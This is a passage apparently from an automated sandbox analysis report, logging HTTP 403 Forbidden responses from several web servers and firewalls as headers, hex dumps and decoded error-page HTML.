moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta name="robots
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 10 Mar 2023 06:59:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15012X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Fri, 10 Mar 2023 06:55:47 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: B1zRLcPn/GRAh50JzData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:47 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Mar 2023 06:55:47 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 10 Mar 2023 06:55:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15014X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 10 Mar 2023 06:55:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15014X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 10 Mar 2023 06:55:49 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveKeep-Alive: timeout=5Vary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 10 Mar 2023 06:55:49 GMTServer: ApacheUpgrade: h2Connection: Upgrade, Keep-AliveX-Powered-By: PHP/7.3.33Content-Length: 0Keep-Alive: timeout=5, max=150Content-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 10 Mar 2023 06:55:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15015X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: BNP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 